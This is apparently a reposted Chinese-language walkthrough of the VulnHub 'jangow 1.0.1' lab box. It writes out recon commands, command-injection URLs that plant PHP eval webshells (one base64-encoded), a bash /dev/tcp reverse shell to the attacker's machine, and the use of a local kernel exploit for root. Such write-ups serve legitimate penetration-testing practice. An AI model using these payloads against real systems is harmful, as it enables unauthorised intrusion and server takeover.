Difficulty: easy
The secret to this box is enumeration! Inquiries [email protected]
This works better with VirtualBox rather than VMware ## Changelog 2021-11-04 - v1.0.1 2021-11-01 - v1.0.0
靶场链接:https://www.vulnhub.com/entry/jangow-101,754/
1、主机发现
netdiscover -i eth1 -r 192.168.43/24
2、端口信息
nmap -sV -Pn -A 192.168.43.132 --script=vuln
nmap -sV -Pn -p 1-65535 192.168.43.132
3、目录信息
目录信息发现了备份文件泄露,里面存在mysql账号密码,但是不能连接,先收集起来。
dirsearch -u http://192.168.43.132/ -e .php
1、命令执行漏洞
这里访问web 页面发现存在一个可疑参数,可能存在文件包含或者命令执行,直接放 bp 去 fuzz 一下,结果如下:
2、源码泄露
这里用mysql的账号密码试了一下ftp,居然进去了。。。
04.获取权限
这里利用命令执行漏洞直接写入webshell
http://192.168.43.132/site/busque.php?buscar=echo " file_put_contents('c.php',' eval($_REQUEST[5]); '); " > d.php
http://192.168.43.132/site/busque.php?buscar=echo " @eval($_POST[pass]); " >> d.php
写进去了,但是post,get,request都被过滤了。用base64写入成功,
echo "PD9waHAgQGV2YWwoJF9QT1NUW3Bhc3NdKTs/Pg=="|base64 -d > 11.php
05.权限提升
由于蚁剑里面提权不好操作,这里反弹一个shell 到 kali。这里有个坑!目标机器iptables 只允许https出入站。
bash -c 'exec bash -i &>/dev/tcp/192.168.43.19/443 <&1'
查看一下版本信息:
在kali 里面找了有对应的exp,然后把45010.c 上传到目标主机目录上:
编译后,生成tiquan 脚本,执行提升为root 权限:
提权成功后,我们使用python 获取一个交互shell,加配置tab 补全功能。
python3 -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
Ctrl+z
stty -a
stty raw -echo;fg
reset
查看iptables 规则:
06.查看FLAG
End
原文始发于微信公众号(贝雷帽SEC):NO.1 jangow01 靶场
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论